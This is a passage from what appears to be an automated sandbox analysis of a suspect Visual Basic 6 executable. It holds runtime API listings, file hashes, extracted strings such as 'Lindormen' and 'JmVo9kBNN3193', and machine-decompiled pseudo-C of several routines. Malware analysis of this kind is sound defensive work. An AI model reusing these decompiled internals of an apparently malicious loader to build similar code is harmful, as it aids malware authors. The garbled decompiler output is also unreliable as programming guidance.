                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC8E
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC9A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DCBA
                  • __vbaUI1I2.MSVBVM60 ref: 0040DCC6
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DCE6
                  • __vbaUI1I2.MSVBVM60 ref: 0040DCF2
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD12
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD1E
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD3E
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD4A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD6A
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD76
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD96
                  • __vbaUI1I2.MSVBVM60 ref: 0040DDA2
                  • __vbaUI1I2.MSVBVM60 ref: 0040DDCE
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DDF1
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE00
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE23
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE32
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE55
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE64
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE87
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE96
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DEB9
                  • __vbaUI1I2.MSVBVM60 ref: 0040DEC8
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DEEB
                  • __vbaUI1I2.MSVBVM60 ref: 0040DEFA
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF1D
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF2C
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF4F
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF5E
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF81
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF90
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DFB3
                  • __vbaUI1I2.MSVBVM60 ref: 0040DFC2
                  • __vbaUI1I2.MSVBVM60 ref: 0040DFF4
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E017
                  • __vbaUI1I2.MSVBVM60 ref: 0040E026
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E049
                  • __vbaUI1I2.MSVBVM60 ref: 0040E058
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E07B
                  • __vbaUI1I2.MSVBVM60 ref: 0040E08A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0AD
                  • __vbaUI1I2.MSVBVM60 ref: 0040E0BC
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0DF
                  • __vbaUI1I2.MSVBVM60 ref: 0040E0EE
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E111
                  • __vbaUI1I2.MSVBVM60 ref: 0040E120
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E143
                  • __vbaUI1I2.MSVBVM60 ref: 0040E152
                  • __vbaFreeVar.MSVBVM60(0040E186), ref: 0040E167
                  • __vbaFreeStr.MSVBVM60(0040E186), ref: 0040E16F
                  • __vbaAryDestruct.MSVBVM60(00000000,?,0040E186), ref: 0040E180
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$BoundsErrorGenerate$Free$ChkstkConstruct2CopyDestruct
                  • String ID:
                  • API String ID: 1600147872-0
                  • Opcode ID: 070233ac252eb0c3092adea65e7e106cc786b6420f791ad58a563d68086ee9b5
                  • Instruction ID: 2b71d42fce75199390b12a949527bc60e3b81bde9108a311d8546963b0edb039
                  • Opcode Fuzzy Hash: 070233ac252eb0c3092adea65e7e106cc786b6420f791ad58a563d68086ee9b5
                  • Instruction Fuzzy Hash: 9D02A074C06208CFEB20EFA6C5517ACBBB1AF16309F1484AFD416B6692C778154ACF1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E0040BA84(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, signed int _a24) {
                  				intOrPtr _v4;
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v24;
                  				char* _v28;
                  				char* _v32;
                  				void* _v36;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				char _v60;
                  				signed int _v68;
                  				char _v76;
                  				intOrPtr _v84;
                  				char _v92;
                  				short _v100;
                  				char _v108;
                  				char _v124;
                  				char _v140;
                  				char* _v148;
                  				char _v156;
                  				intOrPtr _v196;
                  				char _v204;
                  				char* _v208;
                  				short _v212;
                  				char* _v216;
                  				signed int _v220;
                  				signed int _v224;
                  				char* _v236;
                  				intOrPtr _v248;
                  				intOrPtr* _v252;
                  				intOrPtr _v264;
                  				void* _v272;
                  				void* _t159;
                  				char* _t165;
                  				void* _t166;
                  				char* _t167;
                  				char* _t170;
                  				char* _t173;
                  				signed short _t182;
                  				char* _t194;
                  				intOrPtr _t195;
                  				signed int _t197;
                  				short _t208;
                  				char* _t213;
                  				intOrPtr _t220;
                  				void* _t223;
                  				void* _t226;
                  				void* _t230;
                  				char* _t235;
                  				void* _t258;
                  				void* _t261;
                  				void* _t262;
                  				void* _t263;
                  				void* _t265;
                  				intOrPtr _t266;
                  				void* _t267;
                  				intOrPtr* _t268;
                  
                  				_t261 = __esi;
                  				_t258 = __edi;
                  				_t230 = __ebx;
                  				_t263 = _t265;
                  				_t266 = _t265 - 0xc;
                  				asm("cmpsb");
                  				asm("adc al, [eax]");
                  				 *[fs:0x0] = _t266;
                  				 *0xd8 =  *0xd8 + 0xd8;
                  				_t159 = 0xd8 + __ecx;
                  				asm("stc");
                  				asm("invalid");
                  				_v12 = _t266;
                  				_v8 = E00401150;
                  				_v4 = 0;
                  				 *0xd8 =  *0xd8 + _t159;
                  				 *((intOrPtr*)( *_a8 + 4))(_a8, __edi, __esi, __ebx, __edi,  *[fs:0x0], _t262);
                  				_push( &_v24);
                  				_push(0x2003f);
                  				_push(0);
                  				_push( *_a16);
                  				_t165 =  &_v56;
                  				_push(_t165);
                  				L00401474();
                  				_push(_t165);
                  				_t166 = _a12;
                  				_push( *_t166);
                  				E0040AEC0();
                  				_v208 = _t166;
                  				L0040146E();
                  				_push(_v56);
                  				_push(_a16);
                  				L00401468();
                  				_t167 = _v208;
                  				_v32 = _t167;
                  				L00401462();
                  				if(_v32 == 0) {
                  					_v68 = _v68 & 0x00000000;
                  					_v76 = 2;
                  					_push( &_v76);
                  					_push(0x400);
                  					L00401456();
                  					L0040145C();
                  					L00401450();
                  					_v52 = 0x400;
                  					_push( &_v52);
                  					_push(_v48);
                  					_t170 =  &_v60;
                  					_push(_t170);
                  					L00401474();
                  					_push(_t170);
                  					_push( &_v36);
                  					_push(0);
                  					_push( *_a20);
                  					_t173 =  &_v56;
                  					_push(_t173);
                  					L00401474();
                  					_push(_t173);
                  					_push(_v24);
                  					E0040AF0C();
                  					_v208 = _t173;
                  					L0040146E();
                  					_push(_v56);
                  					_push(_a20);
                  					L00401468();
                  					_push(_v60);
                  					_push( &_v48);
                  					L00401468();
                  					_v32 = _v208;
                  					_push( &_v60);
                  					_t167 =  &_v56;
                  					_push(_t167);
                  					_push(2);
                  					L0040144A();
                  					_t267 = _t266 + 0xc;
                  					if(_v32 == 0) {
                  						_v68 = 1;
                  						_v76 = 2;
                  						_v148 =  &_v48;
                  						_v156 = 0x4008;
                  						_push( &_v76);
                  						_push(_v52);
                  						_push( &_v156);
                  						_push( &_v92);
                  						L00401438();
                  						_push( &_v92);
                  						_t182 =  &_v56;
                  						_push(_t182);
                  						L0040143E();
                  						_push(_t182);
                  						L00401444();
                  						asm("sbb eax, eax");
                  						_v212 =  ~( ~_t182 + 1);
                  						_t235 =  &_v56;
                  						L00401462();
                  						_push( &_v92);
                  						_push( &_v76);
                  						_push(2);
                  						L00401432();
                  						_t268 = _t267 + 0xc;
                  						if(_v212 == 0) {
                  							_v148 =  &_v48;
                  							_v156 = 0x4008;
                  							_push(_v52);
                  							_push( &_v156);
                  							_push( &_v76);
                  							L00401426();
                  							_push( &_v76);
                  							L0040142C();
                  							L0040145C();
                  							L00401450();
                  							goto L17;
                  						} else {
                  							_v148 =  &_v48;
                  							_v156 = 0x4008;
                  							_t226 = _v52 - 1;
                  							if(_t226 < 0) {
                  								L31:
                  								L004013FC();
                  								 *[fs:0x0] = _t268;
                  								L004012A0();
                  								_v252 = _t268;
                  								_v248 = 0x401160;
                  								_v264 = 0xa066336a;
                  								_t223 =  *_t268(0x402403, _t258, _t261, _t230, 0x10,  *[fs:0x0], 0x4012a6, _t235, _t235, _t263);
                  								L0040145C();
                  								_push(_v264);
                  								_push(L"Lindormen");
                  								L004013F6();
                  								L0040145C();
                  								_push(_v264);
                  								_push(L"Lindormen");
                  								L004013F6();
                  								L0040145C();
                  								_push(E0040BFB7);
                  								L00401462();
                  								return _t223;
                  							} else {
                  								_push(_t226);
                  								_push( &_v156);
                  								_push( &_v76);
                  								L00401426();
                  								_push( &_v76);
                  								L0040142C();
                  								L0040145C();
                  								L00401450();
                  								L17:
                  								_v216 = _v36;
                  								_t194 = _v216;
                  								_v236 = _t194;
                  								if(_v236 == 1) {
                  									L00401420();
                  									goto L27;
                  								} else {
                  									if(_v236 == 4) {
                  										_v224 = 1;
                  										_v220 = _v220 | 0xffffffff;
                  										_push(_v48);
                  										L0040141A();
                  										_v28 = _t194;
                  										while(_v28 >= _v224) {
                  											_v196 =  *_a24;
                  											_v204 = 8;
                  											_v68 = 1;
                  											_v76 = 2;
                  											_v148 =  &_v48;
                  											_v156 = 0x4008;
                  											_push( &_v76);
                  											_push(_v28);
                  											_push( &_v156);
                  											_push( &_v92);
                  											L00401438();
                  											_push( &_v92);
                  											_t208 =  &_v56;
                  											_push(_t208);
                  											L0040143E();
                  											_push(_t208);
                  											L00401444();
                  											_v100 = _t208;
                  											_v108 = 2;
                  											_push( &_v108);
                  											_push( &_v124);
                  											L0040140E();
                  											_push( &_v204);
                  											_push( &_v124);
                  											_t213 =  &_v140;
                  											_push(_t213);
                  											L00401414();
                  											_push(_t213);
                  											L0040142C();
                  											L0040145C();
                  											_t235 =  &_v56;
                  											L00401462();
                  											_push( &_v140);
                  											_push( &_v124);
                  											_push( &_v108);
                  											_push( &_v92);
                  											_push( &_v76);
                  											_push(5);
                  											L00401432();
                  											_t268 = _t268 + 0x18;
                  											_t220 = _v28 + _v220;
                  											if(_t220 < 0) {
                  												goto L31;
                  											} else {
                  												_v28 = _t220;
                  												continue;
                  											}
                  											goto L33;
                  										}
                  										_v84 = 0x80020004;
                  										_v92 = 0xa;
                  										_push(0x40afdc);
                  										_t197 = _a24;
                  										_push( *_t197);
                  										L00401402();
                  										_v68 = _t197;
                  										_v76 = 8;
                  										_push(1);
                  										_push(1);
                  										_push( &_v92);
                  										_push( &_v76);
                  										L00401408();
                  										L0040145C();
                  										_push( &_v92);
                  										_t194 =  &_v76;
                  										_push(_t194);
                  										_push(2);
                  										L00401432();
                  										goto L27;
                  									} else {
                  										L27:
                  										_v44 = _v44 | 0x0000ffff;
                  										_push(_v24);
                  										E0040AF50();
                  										_v208 = _t194;
                  										L0040146E();
                  										_t195 = _v208;
                  										_v32 = _t195;
                  										goto L29;
                  									}
                  								}
                  							}
                  						}
                  					} else {
                  						goto L28;
                  					}
                  				} else {
                  					L28:
                  					L00401420();
                  					_v44 = _v44 & 0x00000000;
                  					_push(_v24);
                  					E0040AF50();
                  					_v208 = _t167;
                  					L0040146E();
                  					_t195 = _v208;
                  					_v32 = _t195;
                  					L29:
                  					_push(E0040BF02);
                  					L00401462();
                  					return _t195;
                  				}
                  				L33:
                  			}






























































                  0x0040ba84
                  0x0040ba84
                  0x0040ba84
                  0x0040ba85
                  0x0040ba87
                  0x0040ba8b
                  0x0040ba8c
                  0x0040ba96
                  0x0040ba9f
                  0x0040baa1
                  0x0040baa3
                  0x0040baa5
                  0x0040baaa
                  0x0040baad
                  0x0040bab4
                  0x0040bab9
                  0x0040bac3
                  0x0040bac9
                  0x0040baca
                  0x0040bacf
                  0x0040bad4
                  0x0040bad6
                  0x0040bad9
                  0x0040bada
                  0x0040badf
                  0x0040bae0
                  0x0040bae3
                  0x0040bae5
                  0x0040baea
                  0x0040baf0
                  0x0040baf5
                  0x0040baf8
                  0x0040bafb
                  0x0040bb00
                  0x0040bb06
                  0x0040bb0c
                  0x0040bb15
                  0x0040bb1c
                  0x0040bb20
                  0x0040bb2a
                  0x0040bb2b
                  0x0040bb30
                  0x0040bb3a
                  0x0040bb42
                  0x0040bb47
                  0x0040bb51
                  0x0040bb52
                  0x0040bb55
                  0x0040bb58
                  0x0040bb59
                  0x0040bb5e
                  0x0040bb62
                  0x0040bb63
                  0x0040bb68
                  0x0040bb6a
                  0x0040bb6d
                  0x0040bb6e
                  0x0040bb73
                  0x0040bb74
                  0x0040bb77
                  0x0040bb7c
                  0x0040bb82
                  0x0040bb87
                  0x0040bb8a
                  0x0040bb8d
                  0x0040bb92
                  0x0040bb98
                  0x0040bb99
                  0x0040bba4
                  0x0040bbaa
                  0x0040bbab
                  0x0040bbae
                  0x0040bbaf
                  0x0040bbb1
                  0x0040bbb6
                  0x0040bbbd
                  0x0040bbc4
                  0x0040bbcb
                  0x0040bbd5
                  0x0040bbdb
                  0x0040bbe8
                  0x0040bbe9
                  0x0040bbf2
                  0x0040bbf6
                  0x0040bbf7
                  0x0040bbff
                  0x0040bc00
                  0x0040bc03
                  0x0040bc04
                  0x0040bc09
                  0x0040bc0a
                  0x0040bc12
                  0x0040bc17
                  0x0040bc1e
                  0x0040bc21
                  0x0040bc29
                  0x0040bc2d
                  0x0040bc2e
                  0x0040bc30
                  0x0040bc35
                  0x0040bc41
                  0x0040bc93
                  0x0040bc99
                  0x0040bca3
                  0x0040bcac
                  0x0040bcb0
                  0x0040bcb1
                  0x0040bcb9
                  0x0040bcba
                  0x0040bcc4
                  0x0040bccc
                  0x00000000
                  0x0040bc43
                  0x0040bc46
                  0x0040bc4c
                  0x0040bc59
                  0x0040bc5c
                  0x0040bf2b
                  0x0040bf2b
                  0x0040bf41
                  0x0040bf4b
                  0x0040bf53
                  0x0040bf56
                  0x0040bf5d
                  0x0040bf70
                  0x0040bf76
                  0x0040bf7b
                  0x0040bf7e
                  0x0040bf83
                  0x0040bf8d
                  0x0040bf92
                  0x0040bf95
                  0x0040bf9a
                  0x0040bfa4
                  0x0040bfa9
                  0x0040bfb1
                  0x0040bfb6
                  0x0040bc62
                  0x0040bc62
                  0x0040bc69
                  0x0040bc6d
                  0x0040bc6e
                  0x0040bc76
                  0x0040bc77
                  0x0040bc81
                  0x0040bc89
                  0x0040bcd1
                  0x0040bcd4
                  0x0040bcda
                  0x0040bce0
                  0x0040bced
                  0x0040bd03
                  0x00000000
                  0x0040bcef
                  0x0040bcf6
                  0x0040bd0d
                  0x0040bd17
                  0x0040bd1e
                  0x0040bd21
                  0x0040bd26
                  0x0040bd3d
                  0x0040bd51
                  0x0040bd57
                  0x0040bd61
                  0x0040bd68
                  0x0040bd72
                  0x0040bd78
                  0x0040bd85
                  0x0040bd86
                  0x0040bd8f
                  0x0040bd93
                  0x0040bd94
                  0x0040bd9c
                  0x0040bd9d
                  0x0040bda0
                  0x0040bda1
                  0x0040bda6
                  0x0040bda7
                  0x0040bdac
                  0x0040bdb0
                  0x0040bdba
                  0x0040bdbe
                  0x0040bdbf
                  0x0040bdca
                  0x0040bdce
                  0x0040bdcf
                  0x0040bdd5
                  0x0040bdd6
                  0x0040bddb
                  0x0040bddc
                  0x0040bde6
                  0x0040bdeb
                  0x0040bdee
                  0x0040bdf9
                  0x0040bdfd
                  0x0040be01
                  0x0040be05
                  0x0040be09
                  0x0040be0a
                  0x0040be0c
                  0x0040be11
                  0x0040bd2e
                  0x0040bd34
                  0x00000000
                  0x0040bd3a
                  0x0040bd3a
                  0x00000000
                  0x0040bd3a
                  0x00000000
                  0x0040bd34
                  0x0040be19
                  0x0040be20
                  0x0040be27
                  0x0040be2c
                  0x0040be2f
                  0x0040be31
                  0x0040be36
                  0x0040be39
                  0x0040be40
                  0x0040be42
                  0x0040be47
                  0x0040be4b
                  0x0040be4c
                  0x0040be56
                  0x0040be5e
                  0x0040be5f
                  0x0040be62
                  0x0040be63
                  0x0040be65
                  0x00000000
                  0x0040bcf8
                  0x0040be6d
                  0x0040be6d
                  0x0040be72
                  0x0040be75
                  0x0040be7a
                  0x0040be80
                  0x0040be85
                  0x0040be8b
                  0x00000000
                  0x0040be8b
                  0x0040bcf6
                  0x0040bced
                  0x0040bc5c
                  0x0040bbbf
                  0x00000000
                  0x0040bbbf
                  0x0040bb17
                  0x0040be90
                  0x0040be98
                  0x0040be9d
                  0x0040bea2
                  0x0040bea5
                  0x0040beaa
                  0x0040beb0
                  0x0040beb5
                  0x0040bebb
                  0x0040bebe
                  0x0040bebe
                  0x0040befc
                  0x0040bf01
                  0x0040bf01
                  0x00000000

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BAA2
                  • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BADA
                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BAF0
                  • __vbaStrToUnicode.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BAFB
                  • __vbaFreeStr.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB0C
                  • #606.MSVBVM60(00000400,00000002), ref: 0040BB30
                  • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BB3A
                  • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BB42
                  • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000400,00000400,00000002), ref: 0040BB59
                  • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB6E
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB82
                  • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB8D
                  • __vbaStrToUnicode.MSVBVM60(004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB99
                  • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6), ref: 0040BBB1
                  • __vbaStrCopy.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?), ref: 0040BE98
                  • __vbaSetSystemError.MSVBVM60(?), ref: 0040BEB0
                  • __vbaFreeStr.MSVBVM60(0040BF02,?), ref: 0040BEFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                  • String ID: Lindormen
                  • API String ID: 3225542645-1899767452
                  • Opcode ID: 2ffa878715bb6322c00fd39d47d6e4816f8de85f7fbc7c277a8d7b3a19978486
                  • Instruction ID: aeed3d7d155bbf56620b97de44178cffdf431c07101280a4313b8141d9da73f3
                  • Opcode Fuzzy Hash: 2ffa878715bb6322c00fd39d47d6e4816f8de85f7fbc7c277a8d7b3a19978486
                  • Instruction Fuzzy Hash: FFE1D871D00219ABDB10EFE1C845FDEBBB8EF04308F50856AF115B71A2DB789A458F69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E0040E532(void* __ebx, void* __edi, void* __esi, char* _a4, void* _a8, void* _a24, void* _a52) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v40;
                  				void* _v56;
                  				intOrPtr _v60;
                  				void* _v76;
                  				char _v88;
                  				char _v104;
                  				char* _v128;
                  				char _v136;
                  				char* _v160;
                  				intOrPtr _v168;
                  				intOrPtr _v192;
                  				intOrPtr _v200;
                  				char _v220;
                  				void* _v224;
                  				signed int _v228;
                  				intOrPtr* _v240;
                  				signed int _v244;
                  				short _t63;
                  				short _t64;
                  				char* _t69;
                  				signed int _t73;
                  				void* _t101;
                  				void* _t103;
                  				intOrPtr _t104;
                  
                  				_t104 = _t103 - 0xc;
                  				 *[fs:0x0] = _t104;
                  				L004012A0();
                  				_v16 = _t104;
                  				_v12 = 0x401220;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t101);
                  				L004013E4();
                  				L004013E4();
                  				L004013E4();
                  				_push( &_v104);
                  				L00401372();
                  				_v128 = L"supraspinate";
                  				_v136 = 0x8008;
                  				_push( &_v104);
                  				_t63 =  &_v136;
                  				_push(_t63);
                  				L00401378();
                  				_v224 = _t63;
                  				L00401450();
                  				_t64 = _v224;
                  				if(_t64 != 0) {
                  					_v128 = _a4;
                  					_v136 = 9;
                  					_v160 = L"dreas";
                  					_v168 = 8;
                  					if( *0x410010 != 0) {
                  						_v240 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v240 = 0x410010;
                  					}
                  					_t69 =  &_v88;
                  					L004013CC();
                  					_v224 = _t69;
                  					_t73 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v220, _t69,  *((intOrPtr*)( *((intOrPtr*)( *_v240)) + 0x318))( *_v240));
                  					asm("fclex");
                  					_v228 = _t73;
                  					if(_v228 >= 0) {
                  						_v244 = _v244 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b06c);
                  						_push(_v224);
                  						_push(_v228);
                  						L004013D8();
                  						_v244 = _t73;
                  					}
                  					_v192 = _v220;
                  					_v200 = 3;
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t64 = 0x10;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(3);
                  					_push(L"JmVo9kBNN3193");
                  					_push(_v60);
                  					L0040136C();
                  					L004013D2();
                  				}
                  				asm("wait");
                  				_push(E0040E758);
                  				L00401450();
                  				L00401450();
                  				L004013D2();
                  				L00401450();
                  				return _t64;
                  			}






























                  0x0040e535
                  0x0040e544
                  0x0040e550
                  0x0040e558
                  0x0040e55b
                  0x0040e562
                  0x0040e571
                  0x0040e57a
                  0x0040e585
                  0x0040e590
                  0x0040e598
                  0x0040e599
                  0x0040e59e
                  0x0040e5a5
                  0x0040e5b2
                  0x0040e5b3
                  0x0040e5b9
                  0x0040e5ba
                  0x0040e5bf
                  0x0040e5c9
                  0x0040e5ce
                  0x0040e5d7
                  0x0040e5e0
                  0x0040e5e3
                  0x0040e5ed
                  0x0040e5f7
                  0x0040e608
                  0x0040e625
                  0x0040e60a
                  0x0040e60a
                  0x0040e60f
                  0x0040e614
                  0x0040e619
                  0x0040e619
                  0x0040e649
                  0x0040e64d
                  0x0040e652
                  0x0040e66d
                  0x0040e670
                  0x0040e672
                  0x0040e67f
                  0x0040e6a1
                  0x0040e681
                  0x0040e681
                  0x0040e683
                  0x0040e688
                  0x0040e68e
                  0x0040e694
                  0x0040e699
                  0x0040e699
                  0x0040e6ae
                  0x0040e6b4
                  0x0040e6be
                  0x0040e6c1
                  0x0040e6ce
                  0x0040e6cf
                  0x0040e6d0
                  0x0040e6d1
                  0x0040e6d2
                  0x0040e6d5
                  0x0040e6e2
                  0x0040e6e3
                  0x0040e6e4
                  0x0040e6e5
                  0x0040e6e8
                  0x0040e6e9
                  0x0040e6f6
                  0x0040e6f7
                  0x0040e6f8
                  0x0040e6f9
                  0x0040e6fa
                  0x0040e6fc
                  0x0040e701
                  0x0040e704
                  0x0040e70f
                  0x0040e70f
                  0x0040e714
                  0x0040e715
                  0x0040e73a
                  0x0040e742
                  0x0040e74a
                  0x0040e752
                  0x0040e757

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E550
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E57A
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E585
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E590
                  • #670.MSVBVM60(?,?,?,?,?,004012A6), ref: 0040E599
                  • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E5BA
                  • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E5C9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,?,?,00008008,?), ref: 0040E614
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E64D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E694
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6C1
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6D5
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6E9
                  • __vbaLateMemCall.MSVBVM60(?,JmVo9kBNN3193,00000003), ref: 0040E704
                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E70F
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E73A
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E742
                  • __vbaFreeObj.MSVBVM60(0040E758,00008008,?), ref: 0040E74A
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E752
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Chkstk$#670CallCheckHresultLateNew2
                  • String ID: JmVo9kBNN3193$Pt$dreas$supraspinate
                  • API String ID: 1440615753-71710553
                  • Opcode ID: 2f8e8e2b3a8c9fe5cb0afbe8356c3d11df872246310e99466f676cc38362ce2d
                  • Instruction ID: 27285f04c391c3f7c97fc3be7e103f40ac8df5a2e06bceeda8d4fbc4182cfb55
                  • Opcode Fuzzy Hash: 2f8e8e2b3a8c9fe5cb0afbe8356c3d11df872246310e99466f676cc38362ce2d
                  • Instruction Fuzzy Hash: 00511A70900219DFDB20EF91D845BCDB7B5BF08704F5084AAF405BB2A1DBB95A95CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0040E85E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v28;
                  				char _v32;
                  				signed int _v36;
                  				char _v40;
                  				intOrPtr _v48;
                  				char _v56;
                  				intOrPtr _v80;
                  				intOrPtr _v88;
                  				char _v108;
                  				void* _v112;
                  				signed int _v116;
                  				intOrPtr* _v120;
                  				signed int _v124;
                  				signed int _v136;
                  				intOrPtr* _v140;
                  				signed int _v144;
                  				intOrPtr* _v148;
                  				signed int _v152;
                  				char* _t73;
                  				char* _t74;
                  				char* _t78;
                  				signed int _t82;
                  				char* _t88;
                  				signed int _t92;
                  				void* _t116;
                  				void* _t118;
                  				intOrPtr _t119;
                  
                  				_t119 = _t118 - 0xc;
                  				 *[fs:0x0] = _t119;
                  				L004012A0();
                  				_v16 = _t119;
                  				_v12 = 0x401240;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                  				_push(0xb);
                  				_push(0xb);
                  				_push(0x7db);
                  				_push( &_v56);
                  				L00401354();
                  				_t73 =  &_v56;
                  				_push(_t73);
                  				L0040135A();
                  				_v112 =  ~(0 | _t73 != 0x0000ffff);
                  				L00401450();
                  				_t74 = _v112;
                  				if(_t74 != 0) {
                  					if( *0x410010 != 0) {
                  						_v140 = 0x410010;
                  					} else {
                  						_push("P�t");
